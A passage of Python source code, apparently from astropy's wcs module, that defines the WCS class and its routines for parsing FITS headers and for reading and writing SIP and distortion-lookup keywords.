SingularMatrixError = _wcs.SingularMatrixError
InconsistentAxisTypesError = _wcs.InconsistentAxisTypesError
InvalidTransformError = _wcs.InvalidTransformError
InvalidCoordinateError = _wcs.InvalidCoordinateError
NoSolutionError = _wcs.NoSolutionError
InvalidSubimageSpecificationError = _wcs.InvalidSubimageSpecificationError
NonseparableSubimageCoordinateSystemError = _wcs.NonseparableSubimageCoordinateSystemError
NoWcsKeywordsFoundError = _wcs.NoWcsKeywordsFoundError
InvalidTabularParametersError = _wcs.InvalidTabularParametersError
# Copy all the constants from the C extension into this module's namespace
for key, val in _wcs.__dict__.items():
if key.startswith(('WCSSUB', 'WCSHDR', 'WCSHDO')):
locals()[key] = val
__all__.append(key)
# Set coordinate extraction callback for WCS -TAB:
def _load_tab_bintable(hdulist, extnam, extver, extlev, kind, ttype, row, ndim):
arr = hdulist[(extnam, extver)].data[ttype][row - 1]
if arr.ndim != ndim:
if kind == 'c' and ndim == 2:
arr = arr.reshape((arr.size, 1))
else:
raise ValueError("Bad TDIM")
return np.ascontiguousarray(arr, dtype=np.double)
_wcs.set_wtbarr_fitsio_callback(_load_tab_bintable)
else:
WCSBase = object
Wcsprm = object
DistortionLookupTable = object
Sip = object
Tabprm = object
Wtbarr = object
WcsError = None
SingularMatrixError = None
InconsistentAxisTypesError = None
InvalidTransformError = None
InvalidCoordinateError = None
NoSolutionError = None
InvalidSubimageSpecificationError = None
NonseparableSubimageCoordinateSystemError = None
NoWcsKeywordsFoundError = None
InvalidTabularParametersError = None
# Additional relax bit flags
WCSHDO_SIP = 0x80000
# Regular expression defining SIP keyword It matches keyword that starts with A
# or B, optionally followed by P, followed by an underscore then a number in
# range of 0-19, followed by an underscore and another number in range of 0-19.
# Keyword optionally ends with a capital letter.
SIP_KW = re.compile('''^[AB]P?_1?[0-9]_1?[0-9][A-Z]?$''')
def _parse_keysel(keysel):
keysel_flags = 0
if keysel is not None:
for element in keysel:
if element.lower() == 'image':
keysel_flags |= _wcs.WCSHDR_IMGHEAD
elif element.lower() == 'binary':
keysel_flags |= _wcs.WCSHDR_BIMGARR
elif element.lower() == 'pixel':
keysel_flags |= _wcs.WCSHDR_PIXLIST
else:
raise ValueError(
"keysel must be a list of 'image', 'binary' " +
"and/or 'pixel'")
else:
keysel_flags = -1
return keysel_flags
class NoConvergence(Exception):
"""
An error class used to report non-convergence and/or divergence
of numerical methods. It is used to report errors in the
iterative solution used by
the :py:meth:`~astropy.wcs.WCS.all_world2pix`.
Attributes
----------
best_solution : `numpy.ndarray`
Best solution achieved by the numerical method.
accuracy : `numpy.ndarray`
Accuracy of the ``best_solution``.
niter : `int`
Number of iterations performed by the numerical method
to compute ``best_solution``.
divergent : None, `numpy.ndarray`
Indices of the points in ``best_solution`` array
for which the solution appears to be divergent. If the
solution does not diverge, ``divergent`` will be set to `None`.
slow_conv : None, `numpy.ndarray`
Indices of the solutions in ``best_solution`` array
for which the solution failed to converge within the
specified maximum number of iterations. If there are no
non-converging solutions (i.e., if the required accuracy
has been achieved for all input data points)
then ``slow_conv`` will be set to `None`.
"""
def __init__(self, *args, best_solution=None, accuracy=None, niter=None,
divergent=None, slow_conv=None, **kwargs):
super().__init__(*args)
self.best_solution = best_solution
self.accuracy = accuracy
self.niter = niter
self.divergent = divergent
self.slow_conv = slow_conv
if kwargs:
warnings.warn("Function received unexpected arguments ({}) these "
"are ignored but will raise an Exception in the "
"future.".format(list(kwargs)),
AstropyDeprecationWarning)
class FITSFixedWarning(AstropyWarning):
"""
The warning raised when the contents of the FITS header have been
modified to be standards compliant.
"""
pass
class WCS(FITSWCSAPIMixin, WCSBase):
"""WCS objects perform standard WCS transformations, and correct for
`SIP`_ and `distortion paper`_ table-lookup transformations, based
on the WCS keywords and supplementary data read from a FITS file.
See also: http://docs.astropy.org/en/stable/wcs/
Parameters
----------
header : astropy.io.fits header object, Primary HDU, Image HDU, string, dict-like, or None, optional
If *header* is not provided or None, the object will be
initialized to default values.
fobj : An astropy.io.fits file (hdulist) object, optional
It is needed when header keywords point to a `distortion
paper`_ lookup table stored in a different extension.
key : str, optional
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the
``\"a\"`` part of the ``CTYPEia`` cards. *key* may only be
provided if *header* is also provided.
minerr : float, optional
The minimum value a distortion correction must have in order
to be applied. If the value of ``CQERRja`` is smaller than
*minerr*, the corresponding distortion is not applied.
relax : bool or int, optional
Degree of permissiveness:
- `True` (default): Admit all recognized informal extensions
of the WCS standard.
- `False`: Recognize only FITS keywords defined by the
published WCS standard.
- `int`: a bit field selecting specific extensions to accept.
See :ref:`relaxread` for details.
naxis : int or sequence, optional
Extracts specific coordinate axes using
:meth:`~astropy.wcs.Wcsprm.sub`. If a header is provided, and
*naxis* is not ``None``, *naxis* will be passed to
:meth:`~astropy.wcs.Wcsprm.sub` in order to select specific
axes from the header. See :meth:`~astropy.wcs.Wcsprm.sub` for
more details about this parameter.
keysel : sequence of flags, optional
A sequence of flags used to select the keyword types
considered by wcslib. When ``None``, only the standard image
header keywords are considered (and the underlying wcspih() C
function is called). To use binary table image array or pixel
list keywords, *keysel* must be set.
Each element in the list should be one of the following
strings:
- 'image': Image header keywords
- 'binary': Binary table image array keywords
- 'pixel': Pixel list keywords
Keywords such as ``EQUIna`` or ``RFRQna`` that are common to
binary table image arrays and pixel lists (including
``WCSNna`` and ``TWCSna``) are selected by both 'binary' and
'pixel'.
colsel : sequence of int, optional
A sequence of table column numbers used to restrict the WCS
transformations considered to only those pertaining to the
specified columns. If `None`, there is no restriction.
fix : bool, optional
When `True` (default), call `~astropy.wcs.Wcsprm.fix` on
the resulting object to fix any non-standard uses in the
header. `FITSFixedWarning` Warnings will be emitted if any
changes were made.
translate_units : str, optional
Specify which potentially unsafe translations of non-standard
unit strings to perform. By default, performs none. See
`WCS.fix` for more information about this parameter. Only
effective when ``fix`` is `True`.
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid key.
KeyError
Key not found in FITS header.
ValueError
Lookup table distortion present in the header but *fobj* was
not provided.
Notes
-----
1. astropy.wcs supports arbitrary *n* dimensions for the core WCS
(the transformations handled by WCSLIB). However, the
`distortion paper`_ lookup table and `SIP`_ distortions must be
two dimensional. Therefore, if you try to create a WCS object
where the core WCS has a different number of dimensions than 2
and that object also contains a `distortion paper`_ lookup
table or `SIP`_ distortion, a `ValueError`
exception will be raised. To avoid this, consider using the
*naxis* kwarg to select two dimensions from the core WCS.
2. The number of coordinate axes in the transformation is not
determined directly from the ``NAXIS`` keyword but instead from
the highest of:
- ``NAXIS`` keyword
- ``WCSAXESa`` keyword
- The highest axis number in any parameterized WCS keyword.
The keyvalue, as well as the keyword, must be
syntactically valid otherwise it will not be considered.
If none of these keyword types is present, i.e. if the header
only contains auxiliary WCS keywords for a particular
coordinate representation, then no coordinate description is
constructed for it.
The number of axes, which is set as the ``naxis`` member, may
differ for different coordinate representations of the same
image.
3. When the header includes duplicate keywords, in most cases the
last encountered is used.
4. `~astropy.wcs.Wcsprm.set` is called immediately after
construction, so any invalid keywords or transformations will
be raised by the constructor, not when subsequently calling a
transformation method.
"""
def __init__(self, header=None, fobj=None, key=' ', minerr=0.0,
relax=True, naxis=None, keysel=None, colsel=None,
fix=True, translate_units='', _do_set=True):
close_fds = []
if header is None:
if naxis is None:
naxis = 2
wcsprm = _wcs.Wcsprm(header=None, key=key,
relax=relax, naxis=naxis)
self.naxis = wcsprm.naxis
# Set some reasonable defaults.
det2im = (None, None)
cpdis = (None, None)
sip = None
else:
keysel_flags = _parse_keysel(keysel)
if isinstance(header, (str, bytes)):
try:
is_path = (possible_filename(header) and
os.path.exists(header))
except (OSError, ValueError):
is_path = False
if is_path:
if fobj is not None:
raise ValueError(
"Can not provide both a FITS filename to "
"argument 1 and a FITS file object to argument 2")
fobj = fits.open(header)
close_fds.append(fobj)
header = fobj[0].header
elif isinstance(header, fits.hdu.image._ImageBaseHDU):
header = header.header
elif not isinstance(header, fits.Header):
try:
# Accept any dict-like object
orig_header = header
header = fits.Header()
for dict_key in orig_header.keys():
header[dict_key] = orig_header[dict_key]
except TypeError:
raise TypeError(
"header must be a string, an astropy.io.fits.Header "
"object, or a dict-like object")
if isinstance(header, fits.Header):
header_string = header.tostring().rstrip()
else:
header_string = header
# Importantly, header is a *copy* of the passed-in header
# because we will be modifying it
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
header_string = header_string
else:
header_bytes = header_string
header_string = header_string.decode('ascii')
if not (fobj is None or isinstance(fobj, fits.HDUList)):
raise AssertionError("'fobj' must be either None or an "
"astropy.io.fits.HDUList object.")
est_naxis = 2
try:
tmp_header = fits.Header.fromstring(header_string)
self._remove_sip_kw(tmp_header)
tmp_header_bytes = tmp_header.tostring().rstrip()
if isinstance(tmp_header_bytes, str):
tmp_header_bytes = tmp_header_bytes.encode('ascii')
tmp_wcsprm = _wcs.Wcsprm(header=tmp_header_bytes, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, warnings=False,
hdulist=fobj)
if naxis is not None:
try:
tmp_wcsprm = tmp_wcsprm.sub(naxis)
except ValueError:
pass
est_naxis = tmp_wcsprm.naxis if tmp_wcsprm.naxis else 2
except _wcs.NoWcsKeywordsFoundError:
pass
self.naxis = est_naxis
header = fits.Header.fromstring(header_string)
det2im = self._read_det2im_kw(header, fobj, err=minerr)
cpdis = self._read_distortion_kw(
header, fobj, dist='CPDIS', err=minerr)
sip = self._read_sip_kw(header, wcskey=key)
self._remove_sip_kw(header)
header_string = header.tostring()
header_string = header_string.replace('END' + ' ' * 77, '')
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
header_string = header_string
else:
header_bytes = header_string
header_string = header_string.decode('ascii')
try:
wcsprm = _wcs.Wcsprm(header=header_bytes, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, hdulist=fobj)
except _wcs.NoWcsKeywordsFoundError:
# The header may have SIP or distortions, but no core
# WCS. That isn't an error -- we want a "default"
# (identity) core Wcs transformation in that case.
if colsel is None:
wcsprm = _wcs.Wcsprm(header=None, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, hdulist=fobj)
else:
raise
if naxis is not None:
wcsprm = wcsprm.sub(naxis)
self.naxis = wcsprm.naxis
if (wcsprm.naxis != 2 and
(det2im[0] or det2im[1] or cpdis[0] or cpdis[1] or sip)):
raise ValueError(
"""
FITS WCS distortion paper lookup tables and SIP distortions only work
in 2 dimensions. However, WCSLIB has detected {} dimensions in the
core WCS keywords. To use core WCS in conjunction with FITS WCS
distortion paper lookup tables or SIP distortion, you must select or
reduce these to 2 dimensions using the naxis kwarg.
""".format(wcsprm.naxis))
header_naxis = header.get('NAXIS', None)
if header_naxis is not None and header_naxis < wcsprm.naxis:
warnings.warn(
"The WCS transformation has more axes ({:d}) than the "
"image it is associated with ({:d})".format(
wcsprm.naxis, header_naxis), FITSFixedWarning)
self._get_naxis(header)
WCSBase.__init__(self, sip, cpdis, wcsprm, det2im)
if fix:
if header is None:
with warnings.catch_warnings():
warnings.simplefilter('ignore', FITSFixedWarning)
self.fix(translate_units=translate_units)
else:
self.fix(translate_units=translate_units)
if _do_set:
self.wcs.set()
for fd in close_fds:
fd.close()
self._pixel_bounds = None
def __copy__(self):
new_copy = self.__class__()
WCSBase.__init__(new_copy, self.sip,
(self.cpdis1, self.cpdis2),
self.wcs,
(self.det2im1, self.det2im2))
new_copy.__dict__.update(self.__dict__)
return new_copy
def __deepcopy__(self, memo):
from copy import deepcopy
new_copy = self.__class__()
new_copy.naxis = deepcopy(self.naxis, memo)
WCSBase.__init__(new_copy, deepcopy(self.sip, memo),
(deepcopy(self.cpdis1, memo),
deepcopy(self.cpdis2, memo)),
deepcopy(self.wcs, memo),
(deepcopy(self.det2im1, memo),
deepcopy(self.det2im2, memo)))
for key, val in self.__dict__.items():
new_copy.__dict__[key] = deepcopy(val, memo)
return new_copy
def copy(self):
"""
Return a shallow copy of the object.
Convenience method so user doesn't have to import the
:mod:`copy` stdlib module.
.. warning::
Use `deepcopy` instead of `copy` unless you know why you need a
shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Return a deep copy of the object.
Convenience method so user doesn't have to import the
:mod:`copy` stdlib module.
"""
return copy.deepcopy(self)
def sub(self, axes=None):
copy = self.deepcopy()
# We need to know which axes have been dropped, but there is no easy
# way to do this with the .sub function, so instead we assign UUIDs to
# the CNAME parameters in copy.wcs. We can later access the original
# CNAME properties from self.wcs.
cname_uuid = [str(uuid.uuid4()) for i in range(copy.wcs.naxis)]
copy.wcs.cname = cname_uuid
# Subset the WCS
copy.wcs = copy.wcs.sub(axes)
copy.naxis = copy.wcs.naxis
# Construct a list of dimensions from the original WCS in the order
# in which they appear in the final WCS.
keep = [cname_uuid.index(cname) if cname in cname_uuid else None for cname in copy.wcs.cname]
# Restore the original CNAMEs
copy.wcs.cname = ['' if i is None else self.wcs.cname[i] for i in keep]
# Subset pixel_shape and pixel_bounds
if self.pixel_shape:
copy.pixel_shape = tuple([None if i is None else self.pixel_shape[i] for i in keep])
if self.pixel_bounds:
copy.pixel_bounds = [None if i is None else self.pixel_bounds[i] for i in keep]
return copy
if _wcs is not None:
sub.__doc__ = _wcs.Wcsprm.sub.__doc__
def _fix_scamp(self):
"""
Remove SCAMP's PVi_m distortion parameters if SIP distortion parameters
are also present. Some projects (e.g., Palomar Transient Factory)
convert SCAMP's distortion parameters (which abuse the PVi_m cards) to
SIP. However, wcslib gets confused by the presence of both SCAMP and
SIP distortion parameters.
See https://github.com/astropy/astropy/issues/299.
"""
# Nothing to be done if no WCS attached
if self.wcs is None:
return
# Nothing to be done if no PV parameters attached
pv = self.wcs.get_pv()
if not pv:
return
# Nothing to be done if axes don't use SIP distortion parameters
if self.sip is None:
return
# Nothing to be done if any radial terms are present...
# Loop over list to find any radial terms.
# Certain values of the `j' index are used for storing
# radial terms; refer to Equation (1) in
# <http://web.ipac.caltech.edu/staff/shupe/reprints/SIP_to_PV_SPIE2012.pdf>.
pv = np.asarray(pv)
# Loop over distinct values of `i' index
for i in set(pv[:, 0]):
# Get all values of `j' index for this value of `i' index
js = set(pv[:, 1][pv[:, 0] == i])
# Find max value of `j' index
max_j = max(js)
for j in (3, 11, 23, 39):
if j < max_j and j in js:
return
self.wcs.set_pv([])
warnings.warn("Removed redundant SCAMP distortion parameters " +
"because SIP parameters are also present", FITSFixedWarning)
def fix(self, translate_units='', naxis=None):
"""
Perform the fix operations from wcslib, and warn about any
changes it has made.
Parameters
----------
translate_units : str, optional
Specify which potentially unsafe translations of
non-standard unit strings to perform. By default,
performs none.
Although ``"S"`` is commonly used to represent seconds,
its translation to ``"s"`` is potentially unsafe since the
standard recognizes ``"S"`` formally as Siemens, however
rarely that may be used. The same applies to ``"H"`` for
hours (Henry), and ``"D"`` for days (Debye).
This string controls what to do in such cases, and is
case-insensitive.
- If the string contains ``"s"``, translate ``"S"`` to
``"s"``.
- If the string contains ``"h"``, translate ``"H"`` to
``"h"``.
- If the string contains ``"d"``, translate ``"D"`` to
``"d"``.
Thus ``''`` doesn't do any unsafe translations, whereas
``'shd'`` does all of them.
naxis : int array[naxis], optional
Image axis lengths. If this array is set to zero or
``None``, then `~astropy.wcs.Wcsprm.cylfix` will not be
invoked.
"""
if self.wcs is not None:
self._fix_scamp()
fixes = self.wcs.fix(translate_units, naxis)
for key, val in fixes.items():
if val != "No change":
if (key == 'datfix' and '1858-11-17' in val and
not np.count_nonzero(self.wcs.mjdref)):
continue
warnings.warn(
("'{0}' made the change '{1}'.").
format(key, val),
FITSFixedWarning)
def calc_footprint(self, header=None, undistort=True, axes=None, center=True):
"""
Calculates the footprint of the image on the sky.
A footprint is defined as the positions of the corners of the
image on the sky after all available distortions have been
applied.
Parameters
----------
header : `~astropy.io.fits.Header` object, optional
Used to get ``NAXIS1`` and ``NAXIS2``
header and axes are mutually exclusive, alternative ways
to provide the same information.
undistort : bool, optional
If `True`, take SIP and distortion lookup table into
account
axes : length 2 sequence ints, optional
If provided, use the given sequence as the shape of the
image. Otherwise, use the ``NAXIS1`` and ``NAXIS2``
keywords from the header that was used to create this
`WCS` object.
center : bool, optional
If `True` use the center of the pixel, otherwise use the corner.
Returns
-------
coord : (4, 2) array of (*x*, *y*) coordinates.
The order is clockwise starting with the bottom left corner.
"""
if axes is not None:
naxis1, naxis2 = axes
else:
if header is None:
try:
# classes that inherit from WCS and define naxis1/2
# do not require a header parameter
naxis1, naxis2 = self.pixel_shape
except (AttributeError, TypeError):
warnings.warn("Need a valid header in order to calculate footprint\n", AstropyUserWarning)
return None
else:
naxis1 = header.get('NAXIS1', None)
naxis2 = header.get('NAXIS2', None)
if naxis1 is None or naxis2 is None:
raise ValueError(
"Image size could not be determined.")
if center:
corners = np.array([[1, 1],
[1, naxis2],
[naxis1, naxis2],
[naxis1, 1]], dtype=np.float64)
else:
corners = np.array([[0.5, 0.5],
[0.5, naxis2 + 0.5],
[naxis1 + 0.5, naxis2 + 0.5],
[naxis1 + 0.5, 0.5]], dtype=np.float64)
if undistort:
return self.all_pix2world(corners, 1)
else:
return self.wcs_pix2world(corners, 1)
def _read_det2im_kw(self, header, fobj, err=0.0):
"""
Create a `distortion paper`_ type lookup table for detector to
image plane correction.
"""
if fobj is None:
return (None, None)
if not isinstance(fobj, fits.HDUList):
return (None, None)
try:
axiscorr = header['AXISCORR']
d2imdis = self._read_d2im_old_format(header, fobj, axiscorr)
return d2imdis
except KeyError:
pass
dist = 'D2IMDIS'
d_kw = 'D2IM'
err_kw = 'D2IMERR'
tables = {}
for i in range(1, self.naxis + 1):
d_error = header.get(err_kw + str(i), 0.0)
if d_error < err:
tables[i] = None
continue
distortion = dist + str(i)
if distortion in header:
dis = header[distortion].lower()
if dis == 'lookup':
del header[distortion]
assert isinstance(fobj, fits.HDUList), ('An astropy.io.fits.HDUList'
'is required for Lookup table distortion.')
dp = (d_kw + str(i)).strip()
dp_extver_key = dp + '.EXTVER'
if dp_extver_key in header:
d_extver = header[dp_extver_key]
del header[dp_extver_key]
else:
d_extver = 1
dp_axis_key = dp + f'.AXIS.{i:d}'
if i == header[dp_axis_key]:
d_data = fobj['D2IMARR', d_extver].data
else:
d_data = (fobj['D2IMARR', d_extver].data).transpose()
del header[dp_axis_key]
d_header = fobj['D2IMARR', d_extver].header
d_crpix = (d_header.get('CRPIX1', 0.0), d_header.get('CRPIX2', 0.0))
d_crval = (d_header.get('CRVAL1', 0.0), d_header.get('CRVAL2', 0.0))
d_cdelt = (d_header.get('CDELT1', 1.0), d_header.get('CDELT2', 1.0))
d_lookup = DistortionLookupTable(d_data, d_crpix,
d_crval, d_cdelt)
tables[i] = d_lookup
else:
warnings.warn('Polynomial distortion is not implemented.\n', AstropyUserWarning)
for key in set(header):
if key.startswith(dp + '.'):
del header[key]
else:
tables[i] = None
if not tables:
return (None, None)
else:
return (tables.get(1), tables.get(2))
def _read_d2im_old_format(self, header, fobj, axiscorr):
warnings.warn("The use of ``AXISCORR`` for D2IM correction has been deprecated."
"`~astropy.wcs` will read in files with ``AXISCORR`` but ``to_fits()`` will write "
"out files without it.",
AstropyDeprecationWarning)
cpdis = [None, None]
crpix = [0., 0.]
crval = [0., 0.]
cdelt = [1., 1.]
try:
d2im_data = fobj[('D2IMARR', 1)].data
except KeyError:
return (None, None)
except AttributeError:
return (None, None)
d2im_data = np.array([d2im_data])
d2im_hdr = fobj[('D2IMARR', 1)].header
naxis = d2im_hdr['NAXIS']
for i in range(1, naxis + 1):
crpix[i - 1] = d2im_hdr.get('CRPIX' + str(i), 0.0)
crval[i - 1] = d2im_hdr.get('CRVAL' + str(i), 0.0)
cdelt[i - 1] = d2im_hdr.get('CDELT' + str(i), 1.0)
cpdis = DistortionLookupTable(d2im_data, crpix, crval, cdelt)
if axiscorr == 1:
return (cpdis, None)
elif axiscorr == 2:
return (None, cpdis)
else:
warnings.warn("Expected AXISCORR to be 1 or 2", AstropyUserWarning)
return (None, None)
def _write_det2im(self, hdulist):
"""
Writes a `distortion paper`_ type lookup table to the given
`astropy.io.fits.HDUList`.
"""
if self.det2im1 is None and self.det2im2 is None:
return
dist = 'D2IMDIS'
d_kw = 'D2IM'
err_kw = 'D2IMERR'
def write_d2i(num, det2im):
if det2im is None:
return
hdulist[0].header[f'{dist}{num:d}'] = (
'LOOKUP', 'Detector to image correction type')
hdulist[0].header[f'{d_kw}{num:d}.EXTVER'] = (
num, 'Version number of WCSDVARR extension')
hdulist[0].header[f'{d_kw}{num:d}.NAXES'] = (
len(det2im.data.shape), 'Number of independent variables in D2IM function')
for i in range(det2im.data.ndim):
jth = {1: '1st', 2: '2nd', 3: '3rd'}.get(i + 1, f'{i + 1}th')
hdulist[0].header['{}{:d}.AXIS.{:d}'.format(d_kw, num, i + 1)] = (
i + 1, f'Axis number of the {jth} variable in a D2IM function')
image = fits.ImageHDU(det2im.data, name='D2IMARR')
header = image.header
header['CRPIX1'] = (det2im.crpix[0],
'Coordinate system reference pixel')
header['CRPIX2'] = (det2im.crpix[1],
'Coordinate system reference pixel')
header['CRVAL1'] = (det2im.crval[0],
'Coordinate system value at reference pixel')
header['CRVAL2'] = (det2im.crval[1],
'Coordinate system value at reference pixel')
header['CDELT1'] = (det2im.cdelt[0],
'Coordinate increment along axis')
header['CDELT2'] = (det2im.cdelt[1],
'Coordinate increment along axis')
image.ver = int(hdulist[0].header[f'{d_kw}{num:d}.EXTVER'])
hdulist.append(image)
write_d2i(1, self.det2im1)
write_d2i(2, self.det2im2)
def _read_distortion_kw(self, header, fobj, dist='CPDIS', err=0.0):
"""
Reads `distortion paper`_ table-lookup keywords and data, and
returns a 2-tuple of `~astropy.wcs.DistortionLookupTable`
objects.
If no `distortion paper`_ keywords are found, ``(None, None)``
is returned.
"""
if isinstance(header, (str, bytes)):
return (None, None)
if dist == 'CPDIS':
d_kw = 'DP'
err_kw = 'CPERR'
else:
d_kw = 'DQ'
err_kw = 'CQERR'
tables = {}
for i in range(1, self.naxis + 1):
d_error_key = err_kw + str(i)
if d_error_key in header:
d_error = header[d_error_key]
del header[d_error_key]
else:
d_error = 0.0
if d_error < err:
tables[i] = None
continue
distortion = dist + str(i)
if distortion in header:
dis = header[distortion].lower()
del header[distortion]
if dis == 'lookup':
if not isinstance(fobj, fits.HDUList):
raise ValueError('an astropy.io.fits.HDUList is '
'required for Lookup table distortion.')
dp = (d_kw + str(i)).strip()
dp_extver_key = dp + '.EXTVER'
if dp_extver_key in header:
d_extver = header[dp_extver_key]
del header[dp_extver_key]
else:
d_extver = 1
dp_axis_key = dp + f'.AXIS.{i:d}'
if i == header[dp_axis_key]:
d_data = fobj['WCSDVARR', d_extver].data
else:
d_data = (fobj['WCSDVARR', d_extver].data).transpose()
del header[dp_axis_key]
d_header = fobj['WCSDVARR', d_extver].header
d_crpix = (d_header.get('CRPIX1', 0.0),
d_header.get('CRPIX2', 0.0))
d_crval = (d_header.get('CRVAL1', 0.0),
d_header.get('CRVAL2', 0.0))
d_cdelt = (d_header.get('CDELT1', 1.0),
d_header.get('CDELT2', 1.0))
d_lookup = DistortionLookupTable(d_data, d_crpix, d_crval, d_cdelt)
tables[i] = d_lookup
for key in set(header):
if key.startswith(dp + '.'):
del header[key]
else:
warnings.warn('Polynomial distortion is not implemented.\n', AstropyUserWarning)
else:
tables[i] = None
if not tables:
return (None, None)
else:
return (tables.get(1), tables.get(2))
def _write_distortion_kw(self, hdulist, dist='CPDIS'):
"""
Write out `distortion paper`_ keywords to the given
`fits.HDUList`.
"""
if self.cpdis1 is None and self.cpdis2 is None:
return
if dist == 'CPDIS':
d_kw = 'DP'
err_kw = 'CPERR'
else:
d_kw = 'DQ'
err_kw = 'CQERR'
def write_dist(num, cpdis):
if cpdis is None:
return
hdulist[0].header[f'{dist}{num:d}'] = (
'LOOKUP', 'Prior distortion function type')
hdulist[0].header[f'{d_kw}{num:d}.EXTVER'] = (
num, 'Version number of WCSDVARR extension')
hdulist[0].header[f'{d_kw}{num:d}.NAXES'] = (
len(cpdis.data.shape), f'Number of independent variables in {dist} function')
for i in range(cpdis.data.ndim):
jth = {1: '1st', 2: '2nd', 3: '3rd'}.get(i + 1, f'{i + 1}th')
hdulist[0].header['{}{:d}.AXIS.{:d}'.format(d_kw, num, i + 1)] = (
i + 1,
f'Axis number of the {jth} variable in a {dist} function')
image = fits.ImageHDU(cpdis.data, name='WCSDVARR')
header = image.header
header['CRPIX1'] = (cpdis.crpix[0], 'Coordinate system reference pixel')
header['CRPIX2'] = (cpdis.crpix[1], 'Coordinate system reference pixel')
header['CRVAL1'] = (cpdis.crval[0], 'Coordinate system value at reference pixel')
header['CRVAL2'] = (cpdis.crval[1], 'Coordinate system value at reference pixel')
header['CDELT1'] = (cpdis.cdelt[0], 'Coordinate increment along axis')
header['CDELT2'] = (cpdis.cdelt[1], 'Coordinate increment along axis')
image.ver = int(hdulist[0].header[f'{d_kw}{num:d}.EXTVER'])
hdulist.append(image)
write_dist(1, self.cpdis1)
write_dist(2, self.cpdis2)
def _remove_sip_kw(self, header):
"""
Remove SIP information from a header.
"""
# Never pass SIP coefficients to wcslib
# CTYPE must be passed with -SIP to wcslib
for key in set(m.group() for m in map(SIP_KW.match, list(header))
if m is not None):
del header[key]
def _read_sip_kw(self, header, wcskey=""):
"""
Reads `SIP`_ header keywords and returns a `~astropy.wcs.Sip`
object.
If no `SIP`_ header keywords are found, ``None`` is returned.
"""
if isinstance(header, (str, bytes)):
# TODO: Parse SIP from a string without pyfits around
return None
if "A_ORDER" in header and header['A_ORDER'] > 1:
if "B_ORDER" not in header:
raise ValueError(
"A_ORDER provided without corresponding B_ORDER "
"keyword for SIP distortion")
m = int(header["A_ORDER"])
a = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"A_{i}_{j}"
if key in header:
a[i, j] = header[key]
del header[key]
m = int(header["B_ORDER"])
if m > 1:
b = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"B_{i}_{j}"
if key in header:
b[i, j] = header[key]
del header[key]
else:
a = None
b = None
del header['A_ORDER']
del header['B_ORDER']
ctype = [header[f'CTYPE{nax}{wcskey}'] for nax in range(1, self.naxis + 1)]
if any(not ctyp.endswith('-SIP') for ctyp in ctype):
message = """
Inconsistent SIP distortion information is present in the FITS header and the WCS object:
SIP coefficients were detected, but CTYPE is missing a "-SIP" suffix.
astropy.wcs is using the SIP distortion coefficients,
therefore the coordinates calculated here might be incorrect.
If you do not want to apply the SIP distortion coefficients,
please remove the SIP coefficients from the FITS header or the
WCS object. As an example, if the image is already distortion-corrected
(e.g., drizzled) then distortion components should not apply and the SIP
coefficients should be removed.
While the SIP distortion coefficients are being applied here, if that was indeed the intent,
for consistency please append "-SIP" to the CTYPE in the FITS header or the WCS object.
"""
log.info(message)
elif "B_ORDER" in header and header['B_ORDER'] > 1:
raise ValueError(
"B_ORDER provided without corresponding A_ORDER " +
"keyword for SIP distortion")
else:
a = None
b = None
if "AP_ORDER" in header and header['AP_ORDER'] > 1:
if "BP_ORDER" not in header:
raise ValueError(
"AP_ORDER provided without corresponding BP_ORDER "
"keyword for SIP distortion")
m = int(header["AP_ORDER"])
ap = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"AP_{i}_{j}"
if key in header:
ap[i, j] = header[key]
del header[key]
m = int(header["BP_ORDER"])
if m > 1:
bp = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"BP_{i}_{j}"
if key in header:
bp[i, j] = header[key]
del header[key]
else:
ap = None
bp = None
del header['AP_ORDER']
del header['BP_ORDER']
elif "BP_ORDER" in header and header['BP_ORDER'] > 1:
raise ValueError(
"BP_ORDER provided without corresponding AP_ORDER "
"keyword for SIP distortion")
else:
ap = None
bp = None
if a is None and b is None and ap is None and bp is None:
return None
if f"CRPIX1{wcskey}" not in header or f"CRPIX2{wcskey}" not in header:
raise ValueError(
"Header has SIP keywords without CRPIX keywords")
crpix1 = header.get(f"CRPIX1{wcskey}")
crpix2 = header.get(f"CRPIX2{wcskey}")
return Sip(a, b, ap, bp, (crpix1, crpix2))
def _write_sip_kw(self):
"""
Write out SIP keywords. Returns a dictionary of key-value
pairs.
"""
if self.sip is None:
return {}
keywords = {}
def write_array(name, a):
if a is None:
return
size = a.shape[0]
trdir = 'sky to detector' if name[-1] == 'P' else 'detector to sky'
comment = ('SIP polynomial order, axis {:d}, {:s}'
.format(ord(name[0]) - ord('A'), trdir))
keywords[f'{name}_ORDER'] = size - 1, comment
comment = 'SIP distortion coefficient'
for i in range(size):
for j in range(size - i):
if a[i, j] != 0.0:
keywords[
f'{name}_{i:d}_{j:d}'] = a[i, j], comment
write_array('A', self.sip.a)
write_array('B', self.sip.b)
write_array('AP', self.sip.ap)
write_array('BP', self.sip.bp)
return keywords
def _denormalize_sky(self, sky):
if self.wcs.lngtyp != 'RA':
raise ValueError(
"WCS does not have longitude type of 'RA', therefore " +
"(ra, dec) data can not be used as input")
if self.wcs.lattyp != 'DEC':
raise ValueError(
"WCS does not have longitude type of 'DEC', therefore " +
"(ra, dec) data can not be used as input")
if self.wcs.naxis == 2:
if self.wcs.lng == 0 and self.wcs.lat == 1:
return sky
elif self.wcs.lng == 1 and self.wcs.lat == 0:
# Reverse the order of the columns
return sky[:, ::-1]
else:
raise ValueError(
"WCS does not have longitude and latitude celestial " +
"axes, therefore (ra, dec) data can not be used as input")
else:
if self.wcs.lng < 0 or self.wcs.lat < 0:
raise ValueError(
"WCS does not have both longitude and latitude "
"celestial axes, therefore (ra, dec) data can not be " +
"used as input")
out = np.zeros((sky.shape[0], self.wcs.naxis))
